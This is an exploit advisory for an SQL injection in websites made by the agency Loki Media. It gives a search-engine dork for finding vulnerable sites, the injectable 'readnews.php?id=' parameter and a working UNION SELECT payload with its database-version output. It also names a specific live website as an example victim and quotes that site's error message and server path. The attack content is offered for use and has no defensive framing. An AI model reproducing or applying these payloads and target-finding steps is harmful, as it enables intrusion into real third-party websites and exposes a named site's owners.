facebook facebook twitter rss

Designed & Powered by Loki Media ThisisLoki SQL Injection

Author: KingSkrupellos , Published: 08-10-2018

# Exploit Title : Designed & Powered by Loki Media ThisisLoki SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : thisisloki.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Loki - The Full Service Digital Agency

# Google Dork :

intext:''Designed & Powered by Loki Media''

# SQL Injection Exploit :

/readnews.php?id=[SQL Injection]

/readnews.php?id=-1+union+Select+1,2,3,version()--

5.6.39-83.1

#################################################################################################

# Example Vulnerable Site => replasticsurgery.asia/readnews.php?id=4%27 => [ Proof of Concept ] => archive.is/p0xr6

# SQL Database Error =>

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in
/nfs/c04/h01/mnt/58978/domains/replasticsurgery.asia/html/readnews.php on line 19

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :